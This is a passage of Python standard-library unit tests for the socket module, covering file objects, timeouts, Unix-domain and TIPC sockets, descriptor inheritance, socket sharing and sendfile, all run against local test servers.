self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
